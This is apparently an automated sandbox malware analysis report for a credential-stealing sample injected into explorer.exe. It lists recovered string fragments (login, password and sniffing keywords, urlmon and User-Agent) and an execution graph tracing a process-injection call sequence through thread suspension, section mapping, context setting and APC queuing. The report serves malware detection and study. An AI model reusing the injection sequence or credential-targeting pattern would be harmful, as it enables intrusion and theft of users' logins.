                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4538569614.000000000E4D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E4D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e4d0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 2.dl$dll$l32.$ole3$shel
                                  • API String ID: 0-1970020201
                                  • Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                  • Instruction ID: 3c5209f41f95538510ee879fc9b2680ab2a25d1cd0ca83112b5e03f1e682550d
                                  • Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                  • Instruction Fuzzy Hash: 91516CB0918B4D8FDB64EFA4C044AEEB7F1FF58300F404A2E959AE7254EF3095418B89
                                  Function 0E50786F Relevance: 6.4, Strings: 5, Instructions: 157COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4538569614.000000000E4D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E4D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e4d0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4$\$dll$ion.$vers
                                  • API String ID: 0-1610437797
                                  • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                  • Instruction ID: 3938bfd05caa79991c8c7500268ecdeb5d7e614b7d0a7e1ebbe7b58fe3d1e7a8
                                  • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                  • Instruction Fuzzy Hash: 70416F30219B498BDB65EF2498557EA73E4FB98301F444A6EA95EC7240EF30E9458782
                                  Function 0E5094B2 Relevance: 6.4, Strings: 5, Instructions: 149COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4538569614.000000000E4D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E4D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e4d0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 32.d$cli.$dll$sspi$user
                                  • API String ID: 0-327345718
                                  • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                  • Instruction ID: 01081574707aee747cf6e3c50aca43976b15157c6d9d0d1abfb1d1ba86ccc56f
                                  • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                  • Instruction Fuzzy Hash: 9D416030A18E0D8FCB64EF6980A57AD73E1FFD8300F44496AA80ED7295DA71C9418B86
                                  Function 0E507432 Relevance: 5.1, Strings: 4, Instructions: 143COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4538569614.000000000E4D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E4D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e4d0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .dll$el32$h$kern
                                  • API String ID: 0-4264704552
                                  • Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                  • Instruction ID: f5cd303cf2c65579024ad0a96c3ee28289886d57951b30e9ef779675e3f37c60
                                  • Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                  • Instruction Fuzzy Hash: E0419270608B498FD768EF2984943BAB7E1FB98300F144E6FA59EC3295DB70D945CB41
                                  Function 0E50E0B9 Relevance: 5.1, Strings: 4, Instructions: 110COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4538569614.000000000E4D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E4D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e4d0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $Snif$f fr$om:
                                  • API String ID: 0-3434893486
                                  • Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                  • Instruction ID: f93888d5a12c8b4cb7b52f3c5449cecd5c2fb1e4c4339c6d85543f666aa127d3
                                  • Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                  • Instruction Fuzzy Hash: F031D07150CB886FD71AEB28C4856EAB7D4FB94300F504D5EE49BC7291EE30A94ACB43
                                  Function 0E50E0C2 Relevance: 5.1, Strings: 4, Instructions: 109COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4538569614.000000000E4D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E4D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e4d0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $Snif$f fr$om:
                                  • API String ID: 0-3434893486
                                  • Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                  • Instruction ID: 6575017f29e2c7b0235b9d61e5715c86f14b2c97f7af4c0a99d2f06aebd419fa
                                  • Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                  • Instruction Fuzzy Hash: 0031C171508B486FE71AEB28C4856EAB7D4FBD4300F504D2EE49BC7291EE30E946CA43
                                  Function 0E509FC2 Relevance: 5.1, Strings: 4, Instructions: 106COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4538569614.000000000E4D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E4D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e4d0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .dll$chro$hild$me_c
                                  • API String ID: 0-3136806129
                                  • Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                  • Instruction ID: fee265a9f85a3200d19620a487f2e8d9fd92a043e70e02c976d8e9706d51dd08
                                  • Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                  • Instruction Fuzzy Hash: 9E316B30218B094FCB94EF6884A5BAAB7E1FFD8200F944E7DA54ACB255DF30CA458752
                                  Function 0E509FBF Relevance: 5.1, Strings: 4, Instructions: 105COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4538569614.000000000E4D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E4D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e4d0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .dll$chro$hild$me_c
                                  • API String ID: 0-3136806129
                                  • Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                  • Instruction ID: ea5e9893ebe2d82a37b45f93367a7e3b95b385021235a23a6d6ca151ff8023a9
                                  • Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                  • Instruction Fuzzy Hash: 84317E30218B094FCB94EF6884A5BAAB7E1FFD8300F944E7DA54ACB255DF30CA458752
                                  Function 0E50C8C2 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4538569614.000000000E4D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E4D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e4d0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                  • API String ID: 0-319646191
                                  • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                  • Instruction ID: b22125e65c14aad89fee95569eccd02790650c5081a22b9522bc84a87ce31b5b
                                  • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                  • Instruction Fuzzy Hash: D631D131614A0D8BDB04EFA8C8947EDBBE0FB98204F404A6AE55ED7250EE748A45C789
                                  Function 0E50C8BE Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4538569614.000000000E4D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E4D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e4d0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                  • API String ID: 0-319646191
                                  • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                  • Instruction ID: a6ae88d080aaeb13d2832561b6a06ca41c739ce3ca4a2907aab5183d41e6b52e
                                  • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                  • Instruction Fuzzy Hash: D221E470610A0D8FDF04EFA8C8947EDBBE4FF98204F404A6AE55AD7250EF748A05C789
                                  Function 0E50DE92 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4538569614.000000000E4D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E4D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e4d0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .$l$l$t
                                  • API String ID: 0-168566397
                                  • Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                  • Instruction ID: c1cd1f20d7678dbc56db0a864d859112cf055bc83f8324d267b51e8e9cec5111
                                  • Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                  • Instruction Fuzzy Hash: A221AB70A24A0E9FEB08EFA8C0547AEBBF0FF58300F504A6ED109D3600DB749981CB84
                                  Function 0E50DE94 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4538569614.000000000E4D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E4D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e4d0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .$l$l$t
                                  • API String ID: 0-168566397
                                  • Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                  • Instruction ID: eb459a48f6bf14719a681ab17152f8d4bdb2247f9bc1302581d9d30c7c1a3824
                                  • Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                  • Instruction Fuzzy Hash: CF219C70A24A0E9BEB08EFA8D4547EDBBF1FF58304F504A6ED109D3600DB759995CB88
                                  Function 0E50DFF2 Relevance: 5.1, Strings: 4, Instructions: 77COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4538569614.000000000E4D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E4D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e4d0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: auth$logi$pass$user
                                  • API String ID: 0-2393853802
                                  • Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                  • Instruction ID: 44d79a14afba038a40f79e404b7e04aa87d8ca98b456b82c8f975a4afdee7c11
                                  • Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                  • Instruction Fuzzy Hash: A421AC30624B0D8BCB05DF9998A16AEB7E1FF88354F004A59A40AEB244DBB1D9158BC2

                                  Execution Graph

                                  Execution Coverage:1.8%
                                  Dynamic/Decrypted Code Coverage:6.8%
                                  Signature Coverage:0%
                                  Total number of Nodes:619
                                  Total number of Limit Nodes:69
                                  execution_graph 105391 2b49050 105402 2b4bd10 105391->105402 105393 2b4916c 105394 2b4908b 105394->105393 105405 2b3acf0 105394->105405 105398 2b490f0 Sleep 105401 2b490dd 105398->105401 105401->105393 105401->105398 105414 2b48c70 LdrLoadDll 105401->105414 105415 2b48e80 LdrLoadDll 105401->105415 105416 2b4a510 105402->105416 105404 2b4bd3d 105404->105394 105406 2b3ad14 105405->105406 105407 2b3ad50 LdrLoadDll 105406->105407 105408 2b3ad1b 105406->105408 105407->105408 105409 2b44e50 105408->105409 105410 2b44e6a 105409->105410 105411 2b44e5e 105409->105411 105410->105401 105411->105410 105423 2b452d0 LdrLoadDll 105411->105423 105413 2b44fbc 105413->105401 105414->105401 105415->105401 105419 2b4af30 105416->105419 105418 2b4a52c NtAllocateVirtualMemory 105418->105404 105420 2b4af40 105419->105420 105422 2b4af62 105419->105422 105421 2b44e50 LdrLoadDll 105420->105421 105421->105422 105422->105418 105423->105413 105424 4b1cb84 105427 4b1a042 105424->105427 105426 4b1cba5 105428 4b1a06b 105427->105428 105429 4b1a182 NtQueryInformationProcess 105428->105429 105444 4b1a56c 105428->105444 105431 4b1a1ba 105429->105431 105430 4b1a1ef 105430->105426 105431->105430 105432 4b1a290 105431->105432 105433 4b1a2db 105431->105433 105456 4b19de2 NtCreateSection NtMapViewOfSection NtClose 105432->105456 105434 4b1a2fc NtSuspendThread 105433->105434 105436 4b1a30d 105434->105436 105438 4b1a331 105434->105438 105436->105426 105437 4b1a2cf 105437->105426 105440 4b1a412 105438->105440 105447 4b19bb2 105438->105447 105441 4b1a531 105440->105441 105442 4b1a4a6 NtSetContextThread 105440->105442 105443 4b1a552 NtResumeThread 105441->105443 105446 4b1a4bd 105442->105446 105443->105444 105444->105426 105445 4b1a51c NtQueueApcThread 105445->105441 105446->105441 105446->105445 105448 4b19bf7 105447->105448 105449 4b19c66 NtCreateSection 105448->105449 105450 4b19ca0 105449->105450 105451 4b19d4e 105449->105451 105452 4b19cc1 NtMapViewOfSection 105450->105452 105451->105440 105452->105451 105453 4b19d0c 105452->105453 105453->105451 105454 4b19d88 105453->105454 105455 4b19dc5 NtClose 105454->105455 105455->105440 105456->105437 105457 4d82ad0 LdrInitializeThunk 105461 2b4f19d 105464 2b4b9a0 105461->105464 105465 2b4b9c6 105464->105465 105472 2b39d40 105465->105472 105467 2b4b9d2 105468 2b4b9f6 105467->105468 105480 2b38f30 105467->105480 105518 2b4a680 105468->105518 105521 2b39c90 105472->105521 105474 2b39d4d 105475 2b39d54 105474->105475 105533 2b39c30 105474->105533 105475->105467 105481 2b38f57 105480->105481 105930 2b3b1c0 105481->105930 105483 2b38f69 105934 2b3af10 105483->105934 105485 2b38f86 105486 2b38f8d 105485->105486 106005 2b3ae40 LdrLoadDll 105485->106005 105514 2b390f2 105486->105514 105938 2b3f380 105486->105938 105489 2b38ffc 105950 2b3f410 105489->105950 105491 2b39006 105492 2b4bf60 2 API calls 105491->105492 105491->105514 105493 2b3902a 105492->105493 105494 2b4bf60 2 API calls 105493->105494 105495 2b3903b 105494->105495 105496 2b4bf60 2 API calls 105495->105496 105497 2b3904c 105496->105497 105962 2b3ca90 105497->105962 105499 2b39059 105500 2b44a50 8 API calls 105499->105500 105501 2b39066 105500->105501 105502 2b44a50 8 API calls 105501->105502 105503 2b39077 105502->105503 105504 2b390a5 105503->105504 105505 2b39084 105503->105505 105506 2b44a50 8 API calls 105504->105506 105972 2b3d620 105505->105972 105513 2b390c1 105506->105513 105509 2b390e9 105511 2b38d00 23 API calls 105509->105511 105511->105514 105512 2b39092 105988 2b38d00 105512->105988 105513->105509 106006 2b3d6c0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 105513->106006 105514->105468 105519 2b4af30 LdrLoadDll 105518->105519 105520 2b4a69f 105519->105520 105552 2b48b90 105521->105552 105525 2b39cb6 105525->105474 105526 2b39cac 105526->105525 105559 2b4b280 105526->105559 105528 2b39cf3 105528->105525 105570 2b39ab0 105528->105570 105530 2b39d13 105576 2b39620 LdrLoadDll 105530->105576 105532 2b39d25 105532->105474 105909 2b4b570 105533->105909 105536 2b4b570 LdrLoadDll 105537 2b39c5b 105536->105537 105538 2b4b570 LdrLoadDll 105537->105538 105539 2b39c71 105538->105539 105540 2b3f180 105539->105540 105541 2b3f199 105540->105541 105913 2b3b040 105541->105913 105543 2b3f1ac 105917 2b4a1b0 105543->105917 105546 2b39d65 105546->105467 105548 2b3f1d2 105549 2b3f1fd 105548->105549 105923 2b4a230 105548->105923 105551 2b4a460 2 API calls 105549->105551 105551->105546 105553 2b48b9f 105552->105553 105554 2b44e50 LdrLoadDll 105553->105554 105555 2b39ca3 105554->105555 105556 2b48a40 105555->105556 105577 2b4a5d0 105556->105577 105560 2b4b299 105559->105560 105580 2b44a50 105560->105580 105562 2b4b2b1 105563 2b4b2ba 105562->105563 105619 2b4b0c0 105562->105619 105563->105528 105565 2b4b2ce 105565->105563 105637 2b49ed0 105565->105637 105887 2b37ea0 105570->105887 105572 2b39ad1 105572->105530 105573 2b39aca 105573->105572 105900 2b38160 105573->105900 105576->105532 105578 2b4af30 LdrLoadDll 105577->105578 105579 2b48a55 105578->105579 105579->105526 105581 2b44d85 105580->105581 105582 2b44a64 105580->105582 105581->105562 105582->105581 105645 2b49c20 105582->105645 105585 2b44b90 105648 2b4a330 105585->105648 105586 2b44b73 105705 2b4a430 LdrLoadDll 105586->105705 105589 2b44b7d 105589->105562 105590 2b44bb7 105591 2b4bd90 2 API calls 105590->105591 105595 2b44bc3 105591->105595 105592 2b44d49 105594 2b4a460 2 API calls 105592->105594 105593 2b44d5f 105714 2b44790 LdrLoadDll NtReadFile NtClose 105593->105714 105596 2b44d50 105594->105596 105595->105589 105595->105592 105595->105593 105599 2b44c52 105595->105599 105596->105562 105598 2b44d72 105598->105562 105600 2b44cb9 105599->105600 105602 2b44c61 105599->105602 105600->105592 105601 2b44ccc 105600->105601 105707 2b4a2b0 105601->105707 105604 2b44c66 105602->105604 105605 2b44c7a 105602->105605 105706 2b44650 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 105604->105706 105608 2b44c97 105605->105608 105609 2b44c7f 105605->105609 105608->105596 105663 2b44410 105608->105663 105651 2b446f0 105609->105651 105611 2b44c70 105611->105562 105613 2b44d2c 105711 2b4a460 105613->105711 105614 2b44c8d 105614->105562 105617 2b44caf 105617->105562 105618 2b44d38 105618->105562 105621 2b4b0d1 105619->105621 105620 2b4b0e3 105620->105565 105621->105620 105622 2b4bd10 2 API calls 105621->105622 105623 2b4b104 105622->105623 105732 2b44070 105623->105732 105625 2b4b150 105625->105565 105626 2b4b127 105626->105625 105627 2b44070 3 API calls 105626->105627 105628 2b4b149 105627->105628 105628->105625 105764 2b45390 105628->105764 105630 2b4b1da 105631 2b4b1ea 105630->105631 105858 2b4aed0 LdrLoadDll 105630->105858 105774 2b4ad40 105631->105774 105634 2b4b218 105853 2b49e90 105634->105853 105638 2b4af30 LdrLoadDll 105637->105638 105639 2b49eec 105638->105639 105881 4d82c0a 105639->105881 105640 2b49f07 105642 2b4bd90 105640->105642 105884 2b4a640 105642->105884 105644 2b4b329 105644->105528 105646 2b4af30 LdrLoadDll 105645->105646 105647 2b44b44 105646->105647 105647->105585 105647->105586 105647->105589 105649 2b4af30 LdrLoadDll 105648->105649 105650 2b4a34c NtCreateFile 105649->105650 105650->105590 105652 2b4470c 105651->105652 105653 2b4a2b0 LdrLoadDll 105652->105653 105654 2b4472d 105653->105654 105655 2b44734 105654->105655 105656 2b44748 105654->105656 105657 2b4a460 2 API calls 105655->105657 105658 2b4a460 2 API calls 105656->105658 105659 2b4473d 105657->105659 105660 2b44751 105658->105660 105659->105614 105715 2b4bfa0 LdrLoadDll RtlAllocateHeap 105660->105715 105662 2b4475c 105662->105614 105664 2b4448e 105663->105664 105665 2b4445b 105663->105665 105667 2b445d9 105664->105667 105671 2b444aa 105664->105671 105666 2b4a2b0 LdrLoadDll 105665->105666 105668 2b44476 105666->105668 105669 2b4a2b0 LdrLoadDll 105667->105669 105670 2b4a460 2 API calls 105668->105670 105675 2b445f4 105669->105675 105672 2b4447f 105670->105672 105673 2b4a2b0 LdrLoadDll 105671->105673 105672->105617 105674 2b444c5 105673->105674 105677 2b444e1 105674->105677 105678 2b444cc 105674->105678 105728 2b4a2f0 LdrLoadDll 105675->105728 105679 2b444e6 105677->105679 105680 2b444fc 105677->105680 105682 2b4a460 2 API calls 105678->105682 105684 2b4a460 2 API calls 105679->105684 105691 2b44501 105680->105691 105716 2b4bf60 105680->105716 105681 2b4462e 105685 2b4a460 2 API calls 105681->105685 105683 2b444d5 105682->105683 105683->105617 105687 2b444ef 105684->105687 105686 2b44639 105685->105686 105686->105617 105687->105617 105690 2b44567 105692 2b4457e 105690->105692 105727 2b4a270 LdrLoadDll 105690->105727 105698 2b44513 105691->105698 105719 2b4a3e0 105691->105719 105694 2b44585 105692->105694 105695 2b4459a 105692->105695 105696 2b4a460 2 API calls 105694->105696 105697 2b4a460 2 API calls 105695->105697 105696->105698 105699 2b445a3 105697->105699 105698->105617 105700 2b445cf 105699->105700 105722 2b4bb60 105699->105722 105700->105617 105702 2b445ba 105703 2b4bd90 2 API calls 105702->105703 105704 2b445c3 105703->105704 105704->105617 105705->105589 105706->105611 105708 2b4af30 LdrLoadDll 105707->105708 105709 2b44d14 105708->105709 105710 2b4a2f0 LdrLoadDll 105709->105710 105710->105613 105712 2b4af30 LdrLoadDll 105711->105712 105713 2b4a47c NtClose 105712->105713 105713->105618 105714->105598 105715->105662 105729 2b4a600 105716->105729 105718 2b4bf78 105718->105691 105720 2b4af30 LdrLoadDll 105719->105720 105721 2b4a3fc NtReadFile 105720->105721 105721->105690 105723 2b4bb84 105722->105723 105724 2b4bb6d 105722->105724 105723->105702 105724->105723 105725 2b4bf60 2 API calls 105724->105725 105726 2b4bb9b 105725->105726 105726->105702 105727->105692 105728->105681 105730 2b4af30 LdrLoadDll 105729->105730 105731 2b4a61c RtlAllocateHeap 105730->105731 105731->105718 105733 2b44081 105732->105733 105735 2b44089 105732->105735 105733->105626 105734 2b4435c 105734->105626 105735->105734 105859 2b4cf00 105735->105859 105737 2b440dd 105738 2b4cf00 2 API calls 105737->105738 105741 2b440e8 105738->105741 105739 2b44136 105742 2b4cf00 2 API calls 105739->105742 105741->105739 105867 2b4cfa0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 105741->105867 105868 2b4d030 105741->105868 105745 2b4414a 105742->105745 105744 2b441a7 105746 2b4cf00 2 API calls 105744->105746 105745->105744 105747 2b4d030 3 API calls 105745->105747 105748 2b441bd 105746->105748 105747->105745 105749 2b441fa 105748->105749 105751 2b4d030 3 API calls 105748->105751 105750 2b4cf00 2 API calls 105749->105750 105752 2b44205 105750->105752 105751->105748 105753 2b4d030 3 API calls 105752->105753 105760 2b4423f 105752->105760 105753->105752 105756 2b4cf60 2 API calls 105757 2b4433e 105756->105757 105758 2b4cf60 2 API calls 105757->105758 105759 2b44348 105758->105759 105761 2b4cf60 2 API calls 105759->105761 105864 2b4cf60 105760->105864 105762 2b44352 105761->105762 105763 2b4cf60 2 API calls 105762->105763 105763->105734 105765 2b453a1 105764->105765 105766 2b44a50 8 API calls 105765->105766 105767 2b453b7 105766->105767 105768 2b45405 105767->105768 105769 2b453f2 105767->105769 105773 2b4540a 105767->105773 105770 2b4bd90 2 API calls 105768->105770 105771 2b4bd90 2 API calls 105769->105771 105770->105773 105772 2b453f7 105771->105772 105772->105630 105773->105630 105775 2b4ad54 105774->105775 105776 2b4ac00 LdrLoadDll 105774->105776 105874 2b4ac00 105775->105874 105776->105775 105779 2b4ac00 LdrLoadDll 105780 2b4ad66 105779->105780 105781 2b4ac00 LdrLoadDll 105780->105781 105782 2b4ad6f 105781->105782 105783 2b4ac00 LdrLoadDll 105782->105783 105784 2b4ad78 105783->105784 105785 2b4ac00 LdrLoadDll 105784->105785 105786 2b4ad81 105785->105786 105787 2b4ac00 LdrLoadDll 105786->105787 105788 2b4ad8d 105787->105788 105789 2b4ac00 LdrLoadDll 105788->105789 105790 2b4ad96 105789->105790 105791 2b4ac00 LdrLoadDll 105790->105791 105792 2b4ad9f 105791->105792 105793 2b4ac00 LdrLoadDll 105792->105793 105794 2b4ada8 105793->105794 105795 2b4ac00 LdrLoadDll 105794->105795 105796 2b4adb1 105795->105796 105797 2b4ac00 LdrLoadDll 105796->105797 105798 2b4adba 105797->105798 105799 2b4ac00 LdrLoadDll 105798->105799 105800 2b4adc6 105799->105800 105801 2b4ac00 LdrLoadDll 105800->105801 105802 2b4adcf 105801->105802 105803 2b4ac00 LdrLoadDll 105802->105803 105804 2b4add8 105803->105804 105805 2b4ac00 LdrLoadDll 105804->105805 105806 2b4ade1 105805->105806 105807 2b4ac00 LdrLoadDll 105806->105807 105808 2b4adea 105807->105808 105809 2b4ac00 LdrLoadDll 105808->105809 105810 2b4adf3 105809->105810 105811 2b4ac00 LdrLoadDll 105810->105811 105812 2b4adff 105811->105812 105813 2b4ac00 LdrLoadDll 105812->105813 105814 2b4ae08 105813->105814 105815 2b4ac00 LdrLoadDll 105814->105815 105816 2b4ae11 105815->105816 105817 2b4ac00 LdrLoadDll 105816->105817 105818 2b4ae1a 105817->105818 105819 2b4ac00 LdrLoadDll 105818->105819 105820 2b4ae23 105819->105820 105821 2b4ac00 LdrLoadDll 105820->105821 105822 2b4ae2c 105821->105822 105823 2b4ac00 LdrLoadDll 105822->105823 105824 2b4ae38 105823->105824 105825 2b4ac00 LdrLoadDll 105824->105825 105826 2b4ae41 105825->105826 105827 2b4ac00 LdrLoadDll 105826->105827 105828 2b4ae4a 105827->105828 105829 2b4ac00 LdrLoadDll 105828->105829 105830 2b4ae53 105829->105830 105831 2b4ac00 LdrLoadDll 105830->105831 105832 2b4ae5c 105831->105832 105833 2b4ac00 LdrLoadDll 105832->105833 105834 2b4ae65 105833->105834 105835 2b4ac00 LdrLoadDll 105834->105835 105836 2b4ae71 105835->105836 105837 2b4ac00 LdrLoadDll 105836->105837 105838 2b4ae7a 105837->105838 105839 2b4ac00 LdrLoadDll 105838->105839 105840 2b4ae83 105839->105840 105841 2b4ac00 LdrLoadDll 105840->105841 105842 2b4ae8c 105841->105842 105843 2b4ac00 LdrLoadDll 105842->105843 105844 2b4ae95 105843->105844 105845 2b4ac00 LdrLoadDll 105844->105845 105846 2b4ae9e 105845->105846 105847 2b4ac00 LdrLoadDll 105846->105847 105848 2b4aeaa 105847->105848 105849 2b4ac00 LdrLoadDll 105848->105849 105850 2b4aeb3 105849->105850 105851 2b4ac00 LdrLoadDll 105850->105851 105852 2b4aebc 105851->105852 105852->105634 105854 2b4af30 LdrLoadDll 105853->105854 105855 2b49eac 105854->105855 105880 4d82df0 LdrInitializeThunk 105855->105880 105856 2b49ec3 105856->105565 105858->105631 105860 2b4cf16 105859->105860 105861 2b4cf10 105859->105861 105862 2b4bf60 2 API calls 105860->105862 105861->105737 105863 2b4cf3c 105862->105863 105863->105737 105865 2b4bd90 2 API calls 105864->105865 105866 2b44334 105865->105866 105866->105756 105867->105741 105869 2b4cfa0 105868->105869 105870 2b4cffd 105869->105870 105871 2b4bf60 2 API calls 105869->105871 105870->105741 105872 2b4cfda 105871->105872 105873 2b4bd90 2 API calls 105872->105873 105873->105870 105875 2b4ac1b 105874->105875 105876 2b44e50 LdrLoadDll 105875->105876 105877 2b4ac3b 105876->105877 105878 2b44e50 LdrLoadDll 105877->105878 105879 2b4ace7 105877->105879 105878->105879 105879->105779 105880->105856 105882 4d82c1f LdrInitializeThunk 105881->105882 105883 4d82c11 105881->105883 105882->105640 105883->105640 105885 2b4af30 LdrLoadDll 105884->105885 105886 2b4a65c RtlFreeHeap 105885->105886 105886->105644 105888 2b37eb0 105887->105888 105889 2b37eab 105887->105889 105890 2b4bd10 2 API calls 105888->105890 105889->105573 105893 2b37ed5 105890->105893 105891 2b37f38 105891->105573 105892 2b49e90 2 API calls 105892->105893 105893->105891 105893->105892 105894 2b37f3e 105893->105894 105899 2b4bd10 2 API calls 105893->105899 105903 2b4a590 105893->105903 105895 2b37f64 105894->105895 105897 2b4a590 2 API calls 105894->105897 105895->105573 105898 2b37f55 105897->105898 105898->105573 105899->105893 105901 2b4a590 2 API calls 105900->105901 105902 2b3817e 105901->105902 105902->105530 105904 2b4af30 LdrLoadDll 105903->105904 105905 2b4a5ac 105904->105905 105908 4d82c70 LdrInitializeThunk 105905->105908 105906 2b4a5c3 105906->105893 105908->105906 105910 2b4b593 105909->105910 105911 2b3acf0 LdrLoadDll 105910->105911 105912 2b39c4a 105911->105912 105912->105536 105915 2b3b063 105913->105915 105914 2b3b0e0 105914->105543 105915->105914 105928 2b49c60 LdrLoadDll 105915->105928 105918 2b4af30 LdrLoadDll 105917->105918 105919 2b3f1bb 105918->105919 105919->105546 105920 2b4a7a0 105919->105920 105921 